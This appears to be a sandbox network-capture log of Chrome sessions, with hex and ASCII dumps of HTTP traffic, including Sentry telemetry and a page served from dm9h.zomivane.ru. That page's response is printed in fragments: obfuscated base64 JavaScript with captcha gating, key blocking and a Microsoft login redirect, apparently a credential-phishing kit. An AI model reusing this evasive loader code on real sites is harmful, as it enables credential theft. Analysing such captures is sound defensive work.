                                                                                                                                                                                                                                            2025-01-10 12:36:27 UTC1390INData Raw: 0b 85 31 4c 35 2a 2d 51 65 74 a4 c9 7a eb f7 2a 6e 3d 16 0a 7a 8c 2e cb ae 32 73 8a 2b 98 43 bd 93 eb 0c 1f 0c a1 9c ae 16 5f 9e 71 2b 94 54 3d c7 36 2d 83 6c d9 c9 38 7e 06 c2 88 fc 2d da f5 4e f4 9c 5b 87 63 13 9b 1a f1 64 6b 09 49 4f 16 6a 31 e9 dd a9 ad 36 c2 21 99 2f 13 51 d1 34 da 48 18 59 24 50 cc 33 67 67 8d 94 d0 93 a4 de af fd 0b d7 ad e3 6c c6 91 7a d5 78 29 d7 43 9f d2 8f 6c a6 66 17 51 7b 31 52 4c d8 ee ef 18 61 a1 ea f1 e5 9c 0a 21 5c 6a 49 c3 85 9e 6a 4d db b4 88 3d c2 c1 1b 02 2f 10 e6 56 e8 e9 3c 82 36 67 45 69 19 f9 7c bd 2e 67 bd 2e 47 72 2a 6e 3d 16 8a 24 59 9f c3 93 65 b0 91 13 5c 78 86 a7 d6 b2 65 c5 b9 9d 0b 68 eb 95 3b 35 02 30 1e a3 1e 97 bf f7 de c4 06 71 ac 63 1f 32 4f b7 be 71 64 b2 50 0f e1 f6 7e 6d b5 65 4d ce b3 b1 57 6d 4c
                                                                                                                                                                                                                                            Data Ascii: 1L5*-Qetz*n=z.2s+C_q+T=6-l8~-N[cdkIOj16!/Q4HY$P3gglzx)ClfQ{1RLa!\jIjM=/V<6gEi|.g.Gr*n=$Ye\xeh;50qc2OqdP~meMWmL
                                                                                                                                                                                                                                            2025-01-10 12:36:27 UTC1390INData Raw: 5e af ba 62 3f 7b 42 8d 74 0b 6b e4 c6 35 27 56 7d d6 36 44 87 8d a7 d9 33 e2 15 aa 2f 1e 1e 04 52 77 aa ab d6 32 20 2b 56 10 0a 5a 5e 9f 50 f5 a7 87 7c 45 29 8c 61 eb a5 61 3a de 6e fb 55 a6 8a db 78 2f 36 4c e8 a7 f1 22 33 17 9f 73 a8 18 5a 22 45 1c 31 8c 27 d8 be 72 46 53 95 6a 39 5d 7d 3a 76 85 39 d9 9c 10 db 1b 95 d6 27 7f 4f 86 b4 60 d6 e5 0a 4d 9b e8 34 a0 a0 97 44 8a 68 a9 ca 42 7e d5 b5 c9 7d 3b ef 3c 79 84 4c c5 13 8c aa d5 4b ad ef 1a d7 a5 fa 54 ad e3 48 bb d7 67 db 74 d5 a2 8d b0 50 fa 0e 9d b9 c8 7f 62 92 9b 96 d7 96 2f e0 6c a4 46 35 82 67 74 40 44 3d 4c 78 ca cc 54 56 10 23 c7 22 37 93 d7 e6 d7 74 b7 da 7c 06 8e d8 00 3a 88 fe 48 d9 04 1c a8 71 6c fb 16 bd e5 3b e3 f5 4a 8c 3a ab 2e c3 e7 cb fb 05 c6 35 27 56 7d 76 b8 44 87 cd bb 61 18 fa
                                                                                                                                                                                                                                            Data Ascii: ^b?{Btk5'V}6D3/Rw2 +VZ^P|E)aa:nUx/6L"3sZ"E1'rFSj9]}:v9'O`M4DhB~};<yLKTHgtPb/lF5gt@D=LxTV#"7t|:Hql;J:.5'V}vDa


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            111192.168.2.174982634.120.195.2494435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:28 UTC740OUTPOST /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1
                                                                                                                                                                                                                                            Host: o61806.ingest.sentry.io
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Content-Length: 196
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Origin: https://eu.jotform.com
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:28 UTC196OUTData Raw: 7b 7d 0a 7b 22 74 79 70 65 22 3a 22 63 6c 69 65 6e 74 5f 72 65 70 6f 72 74 22 7d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 33 36 35 31 32 35 38 37 2e 31 38 31 2c 22 64 69 73 63 61 72 64 65 64 5f 65 76 65 6e 74 73 22 3a 5b 7b 22 72 65 61 73 6f 6e 22 3a 22 73 61 6d 70 6c 65 5f 72 61 74 65 22 2c 22 63 61 74 65 67 6f 72 79 22 3a 22 74 72 61 6e 73 61 63 74 69 6f 6e 22 2c 22 71 75 61 6e 74 69 74 79 22 3a 31 7d 2c 7b 22 72 65 61 73 6f 6e 22 3a 22 73 61 6d 70 6c 65 5f 72 61 74 65 22 2c 22 63 61 74 65 67 6f 72 79 22 3a 22 73 70 61 6e 22 2c 22 71 75 61 6e 74 69 74 79 22 3a 31 7d 5d 7d
                                                                                                                                                                                                                                            Data Ascii: {}{"type":"client_report"}{"timestamp":1736512587.181,"discarded_events":[{"reason":"sample_rate","category":"transaction","quantity":1},{"reason":"sample_rate","category":"span","quantity":1}]}
                                                                                                                                                                                                                                            2025-01-10 12:36:29 UTC530INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:28 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                                                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            2025-01-10 12:36:29 UTC12INData Raw: 32 0d 0a 7b 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2{}0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            112192.168.2.174982734.120.195.2494435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:29 UTC476OUTGET /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1
                                                                                                                                                                                                                                            Host: o61806.ingest.sentry.io
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:29 UTC290INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:29 GMT
                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2025-01-10 12:36:29 UTC548INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            113192.168.2.1749831104.21.96.14435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:33 UTC654OUTGET /oIZnEw3n/ HTTP/1.1
                                                                                                                                                                                                                                            Host: dm9h.zomivane.ru
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:33 UTC1246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:33 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: no-cache, private
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=foFEKHQ8ADFmrX6JTxFA%2F6zcmfP%2B8cXCkFEcydszYmQb2Nlb9DSh6EpditxyGistZg%2FaGe1AqZDPz4wzGOmG2gKFk55JYlh4HZVU1%2BofOWLK75Q%2BRHkFQibWRG6rqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=5274&min_rtt=5021&rtt_var=1615&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1557&delivery_rate=559528&cwnd=251&unsent_bytes=0&cid=61f5ebd6f0aa2062&ts=121&x=0"
                                                                                                                                                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6Im1WWU12dVloRkxqWGUwaTVoa3VCV1E9PSIsInZhbHVlIjoiTUdCL0xRTXprK0F6K202cHA4enZLR3lkT1lkUEdlRmExL0RiZWtsTkp5Z1FLazVVVSthMUZKSDRyeUNKU3k3Y0p2N2ZpRFlsVEI0TFlNOUxHS1NveXpER3RaaTdoblUvRkdDQzdUamsxWkxhN00yVWFnVC9CU1M0bG9pQUpHWmoiLCJtYWMiOiIzYjg3YjE0MmZiZjYwOTk1ZjFlNjk4ZWU3ODMyOTJmYTQyYzBkMGFhODdjNDc5MzAzY2ZhNjYyNDIzYmNjNDNjIiwidGFnIjoiIn0%3D; expires=Fri, 10-Jan-2025 14:36:33 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                                                                                                                            2025-01-10 12:36:33 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 70 4e 4d 46 52 61 63 6c 70 5a 4e 47 68 77 54 31 52 79 65 48 6b 76 54 33 59 32 62 31 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4e 6e 64 42 51 58 51 7a 62 79 39 45 53 58 5a 48 54 6a 46 52 65 48 64 6c 61 31 64 6b 64 57 6f 76 62 6d 46 55 57 47 59 30 4e 6c 4a 4a 54 47 46 33 4c 30 67 79 62 7a 56 78 5a 33 64 4f 5a 33 6c 4a 52 33 64 77 63 47 5a 70 4e 6b 35 48 54 45 46 36 62 58 4e 6d 4f 58 6c 44 51 31 4a 48 59 6e 6c 68 63 56 56 77 5a 6b 70 4a 52 56 56 52 59 6c 42 72 61 33 4a 46 53 55 46 6b 4d 55 56 69 4e 32 31 44 56 6d 46 59 65 55 59 32 59 6e 64 4c 51 55 52 69 63 55 46 43 62 6d 77 30 4f 45 5a 48 55 6a 64 34 62 6d 46 32 61 47 70 55 56 6a 45
                                                                                                                                                                                                                                            Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkpNMFRaclpZNGhwT1RyeHkvT3Y2b1E9PSIsInZhbHVlIjoiNndBQXQzby9ESXZHTjFReHdla1dkdWovbmFUWGY0NlJJTGF3L0gybzVxZ3dOZ3lJR3dwcGZpNk5HTEF6bXNmOXlDQ1JHYnlhcVVwZkpJRVVRYlBra3JFSUFkMUViN21DVmFYeUY2YndLQURicUFCbmw0OEZHUjd4bmF2aGpUVjE
                                                                                                                                                                                                                                            2025-01-10 12:36:33 UTC1369INData Raw: 38 30 66 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 74 68 65 20 73 75 6d 20 6f 66 20 73 6d 61 6c 6c 20 65 66 66 6f 72 74 73 2c 20 72 65 70 65 61 74 65 64 20 64 61 79 20 69 6e 20 61 6e 64 20 64 61 79 20 6f 75 74 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 74 68 65 20 6b 65 79 20 74 6f 20 68 61 70 70 69 6e 65 73 73 2e 20 48 61 70 70 69 6e 65 73 73 20 69 73 20 74 68 65 20 6b 65 79 20 74 6f 20 73 75 63 63 65 73 73 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 6b 62 54 6c 49 4c 6e 70 76 62 57 6c 32 59 57 35 6c 4c 6e 4a 31 4c 32 39 4a 57 6d 35 46 64 7a 4e 75 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72
                                                                                                                                                                                                                                            Data Ascii: 80f... Success is the sum of small efforts, repeated day in and day out. --><script>/* Success is not the key to happiness. Happiness is the key to success. */if(atob("aHR0cHM6Ly9kbTlILnpvbWl2YW5lLnJ1L29JWm5FdzNuLw==") == "nomatch"){document.wr
                                                                                                                                                                                                                                            2025-01-10 12:36:33 UTC701INData Raw: 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 53 33 42 73 54 6d 52 73 52 6b 5a 31 59 79 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 30 74 77 62 45 35 6b 62 45 5a 47 64 57 4d 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4f 54 42 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59
                                                                                                                                                                                                                                            Data Ascii: JlbTt9DQp9DQojS3BsTmRsRkZ1YyBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI0twbE5kbEZGdWMuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogOTBweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2Y
                                                                                                                                                                                                                                            2025-01-10 12:36:33 UTC1369INData Raw: 31 38 66 65 0d 0a 43 42 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 69 42 6a 59 57 78 6a 4b 43 34 35 4d 44 42 79 5a 57 30 67 4b 79 41 75 4d 33 5a 33 4b 54 74 39 44 51 6f 6a 53 33 42 73 54 6d 52 73 52 6b 5a 31 59 79 41 75 61 6e 56 7a 64 47 6c 6d 65 53 31 6a 62 32 35 30 5a 57 35 30 4c 57 4e 6c 62 6e 52 6c 63 6e 74 71 64 58 4e 30 61 57 5a 35 4c 57 4e 76 62 6e 52 6c 62 6e 51 36 59 32 56 75 64 47 56 79 49 57 6c 74 63 47 39 79 64 47 46 75 64 44 74 39 44 51 6f 6a 53 33 42 73 54 6d 52 73 52 6b 5a 31 59 79 35 74 64 43 30 31 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 33 4a 6c 62 53 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 49 30 74 77 62 45 35 6b 62 45 5a 47 64 57 4d 67 4c 6d 31 30 4c 54 51 67 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 49 44
                                                                                                                                                                                                                                            Data Ascii: 18feCB7Zm9udC1zaXplOiBjYWxjKC45MDByZW0gKyAuM3Z3KTt9DQojS3BsTmRsRkZ1YyAuanVzdGlmeS1jb250ZW50LWNlbnRlcntqdXN0aWZ5LWNvbnRlbnQ6Y2VudGVyIWltcG9ydGFudDt9DQojS3BsTmRsRkZ1Yy5tdC01e21hcmdpbi10b3A6M3JlbSFpbXBvcnRhbnQ7fQ0KI0twbE5kbEZGdWMgLm10LTQge21hcmdpbi10b3A6ID
                                                                                                                                                                                                                                            2025-01-10 12:36:33 UTC1369INData Raw: 49 43 68 6c 64 6d 56 75 64 43 35 74 5a 58 52 68 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 46 73 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 33 4d 79 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 31 6c 64 47 46 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 59 57 78 30 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 59 33 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 62 57 56 30 59 55 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 4e 43 69 41 67 49 43 41 70 49 48 73 4e 43 69 41 67 49 43 41
                                                                                                                                                                                                                                            Data Ascii: IChldmVudC5tZXRhS2V5ICYmIGV2ZW50LmFsdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50Lm1ldGFLZXkgJiYgZXZlbnQuYWx0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDY3KSB8fA0KICAgICAgICAoZXZlbnQubWV0YUtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkNCiAgICApIHsNCiAgICA
                                                                                                                                                                                                                                            2025-01-10 12:36:33 UTC1369INData Raw: 69 42 70 5a 44 30 69 53 33 42 73 54 6d 52 73 52 6b 5a 31 59 79 49 67 59 32 78 68 63 33 4d 39 49 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 39 75 64 47 46 70 62 6d 56 79 49 6a 34 4e 43 6a 78 6b 61 58 59 67 61 57 51 39 49 6c 46 59 53 30 52 56 55 46 4a 77 63 6e 6f 69 49 47 4e 73 59 58 4e 7a 50 53 4a 71 64 58 4e 30 61 57 5a 35 4c 57 4e 76 62 6e 52 6c 62 6e 51 74 59 32 56 75 64 47 56 79 49 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 6a 34 4e 43 6a 78 6d 62 33 4a 74 49 47 6c 6b 50 53 4a 69 57 6b 4e 34 63 6b 39 36 5a 45 74 46 49 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6d 4e 6d 58 33 52 31 63 6d 35 7a 64 47 6c 73 5a 53 49 67 61 57 51 39 49 6d 4e 6d 49 6a 34 38 4c 32 52 70 64 6a 34 4e
                                                                                                                                                                                                                                            Data Ascii: iBpZD0iS3BsTmRsRkZ1YyIgY2xhc3M9ImNhcHRjaGEtY29udGFpbmVyIj4NCjxkaXYgaWQ9IlFYS0RVUFJwcnoiIGNsYXNzPSJqdXN0aWZ5LWNvbnRlbnQtY2VudGVyIj4NCjxkaXYgY2xhc3M9InRleHQtY2VudGVyIj4NCjxmb3JtIGlkPSJiWkN4ck96ZEtFIj4NCjxkaXYgY2xhc3M9ImNmX3R1cm5zdGlsZSIgaWQ9ImNmIj48L2Rpdj4N
                                                                                                                                                                                                                                            2025-01-10 12:36:33 UTC1369INData Raw: 4a 61 51 33 68 79 54 33 70 6b 53 30 55 69 4b 54 73 4e 43 69 41 67 49 43 42 71 55 6d 64 7a 61 57 5a 43 5a 6e 4e 52 4c 6d 39 75 63 33 56 69 62 57 6c 30 49 44 30 67 5a 6e 56 75 59 33 52 70 62 32 34 67 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 66 54 73 4e 43 69 41 67 49 43 42 6b 62 32 4e 31 62 57 56 75 64 43 35 6e 5a 58 52 46 62 47 56 74 5a 57 35 30 51 6e 6c 4a 5a 43 67 69 63 47 46 6e 5a 57 78 70 62 6d 73 69 4b 53 35 32 59 57 78 31 5a 53 41 39 49 43 63 77 56 31 52 6a 64 79 63 37 44 51 6f 67 49 43 41 67 64 6d 46 79 49 47 64 54 54 45 35 79 55 30 4a 50 61 31 55 67 50 53 41 69 4c 69 34 76 64 47 52 68 63 6e 64 4a 53
                                                                                                                                                                                                                                            Data Ascii: JaQ3hyT3pkS0UiKTsNCiAgICBqUmdzaWZCZnNRLm9uc3VibWl0ID0gZnVuY3Rpb24gKGV2ZW50KSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgfTsNCiAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgicGFnZWxpbmsiKS52YWx1ZSA9ICcwV1Rjdyc7DQogICAgdmFyIGdTTE5yU0JPa1UgPSAiLi4vdGRhcndJS
                                                                                                                                                                                                                                            2025-01-10 12:36:33 UTC930INData Raw: 4b 49 43 41 67 49 43 35 6a 59 58 52 6a 61 43 68 6c 63 6e 4a 76 63 69 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 64 32 6c 75 5a 47 39 33 4c 6d 78 76 59 32 46 30 61 57 39 75 4c 6e 4a 6c 63 47 78 68 59 32 55 6f 4a 32 68 30 64 48 42 7a 4f 69 38 76 62 47 39 6e 61 57 34 75 62 57 6c 6a 63 6d 39 7a 62 32 5a 30 62 32 35 73 61 57 35 6c 4c 6d 4e 76 62 53 63 70 4f 77 30 4b 49 43 41 67 49 48 30 70 4f 77 30 4b 66 51 30 4b 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 4e 43 6a 77 76 59 6d 39 6b 65 54 34 4e 43 67 30 4b 50 43 39 6f 64 47 31 73 50 67 3d 3d 27 29 29 29 29 3b 0d 0a 76 61 72 20 44 6b 69 65 63 73 79 51 6f 7a 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 0d 0a 44 6b 69 65 63 73 79 51 6f 7a 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65
                                                                                                                                                                                                                                            Data Ascii: KICAgIC5jYXRjaChlcnJvciA9PiB7DQogICAgd2luZG93LmxvY2F0aW9uLnJlcGxhY2UoJ2h0dHBzOi8vbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbScpOw0KICAgIH0pOw0KfQ0KPC9zY3JpcHQ+DQoNCjwvYm9keT4NCg0KPC9odG1sPg=='))));var DkiecsyQoz = document.currentScript;DkiecsyQoz.parentNode.re
                                                                                                                                                                                                                                            2025-01-10 12:36:33 UTC1369INData Raw: 32 30 61 62 0d 0a 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 6f 4d 56 68 66 50 52 74 63 72 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 6f 4d 56 68 66 50 52 74 63 72 2e 70 61 74 68 6e 61 6d 65 20 3d 20 6f 4d 56 68 66 50 52 74 63 72 2e 70 61 74 68 6e 61 6d 65 2e 73 6c 69 63 65 28 30 2c 20 2d 31 29 3b 0d 0a 7d 0d 0a 63 6f 6e 73 74 20 54 6e 75 72 79 78 4a 67 49 47 20 3d 20 6f 4d 56 68 66 50 52 74 63 72 2e 70 61 74 68 6e 61 6d 65 2b 27 2f 27 3b 0d 0a 69 66 28 54 6e 75 72 79 78 4a 67 49 47 20 3d 3d 20 54 56 54 4a 53 58 4e 6b 58 6c 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27
                                                                                                                                                                                                                                            Data Ascii: 20ab')[0].split('%3F')[0];if (oMVhfPRtcr.pathname.endsWith('/')) {oMVhfPRtcr.pathname = oMVhfPRtcr.pathname.slice(0, -1);}const TnuryxJgIG = oMVhfPRtcr.pathname+'/';if(TnuryxJgIG == TVTJSXNkXl){document.write(decodeURIComponent(escape(atob('
